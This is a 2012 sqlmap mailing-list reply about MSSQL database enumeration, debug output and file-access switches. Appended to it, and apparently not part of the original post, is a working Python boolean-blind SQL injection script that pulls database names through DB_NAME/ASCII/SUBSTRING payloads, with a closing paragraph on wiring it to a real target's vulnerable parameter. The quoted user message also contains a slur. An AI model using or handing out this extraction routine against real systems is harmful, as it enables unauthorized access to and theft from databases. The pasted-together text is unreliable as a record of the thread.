Re: [sqlmap-users] ms sql database names' enum
From: Bernardo D. A. G. <ber...@gm...> - 2012-07-03 09:50:11
Hi Henry,

On 3 July 2012 01:01, Henry Waves <mic...@gm...> wrote:
> I've met dozens of practical cases when the --dbs switch becomes useless
> with --dbms=mssql (can't say precisely, but maybe <2008 versions). The
> only workaround that proved itself useful is retrieval of db_name(i++) using
> --sql-shell, while other standard techniques were totally useless.

We have been notified already that there might be a bug with --dbs and --tables on MSSQL (particularly version 2008). We will look closely in the upcoming weeks into reproducing this bug, if any, across all MSSQL versions. I have opened issue #55[1] for the time being and will keep you posted there with comments.

> Another reason I decided to compose this miserable letter is that I
> would like to see debug information on how the page is being parsed, in order
> to determine the exact string or regexp or whatever sqlmap uses to pick up
> context output or to determine the boolean value for a positive logical
> answer.

If you run sqlmap with -v 3, not only do you see all injected SQLi payloads, but following detection, it also shows you the exact vector used to identify the vulnerable and exploitable SQLi technique.

> Uploading specific files for MSSQL would be great too, because
> currently I choose other commercial products which are ugly, heavy,
> GUI and Windows only, in order to execute OS commands (that thing
> appeared to be broken in almost every semi-complicated case, while it worked
> fine on some fucking retarded pangolin\webcruiser\etc. tools) or
> upload something over designed and accessible routines of MS SQL in
> certain cases. Maybe I'm missing some concepts, but the first thing
> I've mentioned above deserves your attention for sure. Thanks :*

We have had support to interact with the underlying file system since 2009. Relevant switches are --file-read, --file-write and --file-dest. --tmp-path might also be of use here; check the user's manual for details and examples.

I am not aware at the moment of any bug related to these switches, but please go ahead and open an issue[2] with details to reproduce the bug, if any. I have recently retested all these switches across all three supported DBMS (MSSQL, PgSQL and MySQL) and they all worked fine.

[1] https://github.com/sqlmapproject/sqlmap/issues/55
[2] https://github.com/sqlmapproject/sqlmap/issues/new

-- 
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
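The db_name(i++) workaround Henry describes, worked through as an added example (this is not sqlmap's code and not code from either poster): walk MSSQL database ids and pull each DB_NAME(i) one character at a time through a yes/no oracle, which is also the shape of the boolean-based blind technique whose payloads sqlmap prints at -v 3. Everything here is assumed for illustration: the in-memory FAKE_INSTANCE stands in for a real server (a real oracle would send the condition in a request and test the response for the "true" marker), and the bound taken from MAX(database_id) in master..sysdatabases is an addition so that a dropped database (an unused id, for which DB_NAME returns NULL) does not stop the loop early.

```python
"""Boolean-blind enumeration of MSSQL database names via DB_NAME(i).

The enumerator below only emits T-SQL boolean conditions and consumes
True/False answers, exactly as it would against a real injection point.
"""
import re
from typing import Callable, Dict, Optional

Oracle = Callable[[str], bool]

# Constructed sample instance (hypothetical). database_id 5 is deliberately
# missing to mimic a dropped database: DB_NAME(5) is NULL but ids continue.
FAKE_INSTANCE: Dict[int, str] = {
    1: "master", 2: "tempdb", 3: "model", 4: "msdb", 6: "webapp",
}

_RE_CHAR = re.compile(r"^ASCII\(SUBSTRING\(DB_NAME\((\d+)\),(\d+),1\)\)>(\d+)$")
_RE_LEN = re.compile(r"^LEN\(DB_NAME\((\d+)\)\)>(\d+)$")
_RE_MAXID = re.compile(r"^\(SELECT MAX\(database_id\) FROM master\.\.sysdatabases\)>(\d+)$")


def fake_oracle(condition: str) -> bool:
    """Simulated injectable page: True when the injected condition holds.

    Implements just enough T-SQL semantics for the three payload shapes
    used below. Comparisons against NULL are never true, which is what
    makes an unused database id come back as "no such name".
    """
    if m := _RE_CHAR.match(condition):
        dbid, pos, thr = map(int, m.groups())
        name = FAKE_INSTANCE.get(dbid)
        if name is None or pos > len(name):
            return False
        return ord(name[pos - 1]) > thr
    if m := _RE_LEN.match(condition):
        dbid, thr = map(int, m.groups())
        name = FAKE_INSTANCE.get(dbid)
        return name is not None and len(name) > thr
    if m := _RE_MAXID.match(condition):
        return max(FAKE_INSTANCE) > int(m.group(1))
    raise ValueError(f"unsupported condition: {condition}")


def bisect_int(ask: Callable[[int], bool], low: int = 0, high: int = 255) -> int:
    """Find v in [low, high] given an oracle answering 'v > t' for any t.

    Takes about log2(high - low) queries instead of one per candidate,
    which is what keeps blind extraction practical over HTTP.
    """
    while low < high:
        mid = (low + high) // 2
        if ask(mid):
            low = mid + 1
        else:
            high = mid
    return low


def fetch_db_name(oracle: Oracle, dbid: int) -> Optional[str]:
    """Pull DB_NAME(dbid) character by character; None when the id is unused.

    ASCII() covers 7/8-bit names only; a database with non-Latin characters
    in its name would need UNICODE() and a wider bisection range.
    """
    if not oracle(f"LEN(DB_NAME({dbid}))>0"):
        return None
    # sysname is at most 128 characters, so that bounds the length search.
    length = bisect_int(lambda t: oracle(f"LEN(DB_NAME({dbid}))>{t}"), 0, 128)
    chars = []
    for pos in range(1, length + 1):
        code = bisect_int(
            lambda t, p=pos: oracle(f"ASCII(SUBSTRING(DB_NAME({dbid}),{p},1))>{t}"),
            0, 255,
        )
        chars.append(chr(code))
    return "".join(chars)


def enumerate_databases(oracle: Oracle) -> Dict[int, str]:
    """Walk ids 1..MAX(database_id); gaps left by dropped databases are skipped."""
    last = bisect_int(
        lambda t: oracle(f"(SELECT MAX(database_id) FROM master..sysdatabases)>{t}"),
        0, 32767,
    )
    found: Dict[int, str] = {}
    for dbid in range(1, last + 1):
        name = fetch_db_name(oracle, dbid)
        if name is not None:
            found[dbid] = name
    return found


if __name__ == "__main__":
    for dbid, name in enumerate_databases(fake_oracle).items():
        print(f"DB_NAME({dbid}) = {name}")
```

To use this against a real target, replace fake_oracle with a function that injects the condition string into the vulnerable parameter and returns whether the response carries the "true" marker; the enumeration logic does not change. Stopping at the first NULL instead of bounding by MAX(database_id) is the usual mistake when doing this by hand in --sql-shell, since any dropped database leaves a hole in the id sequence.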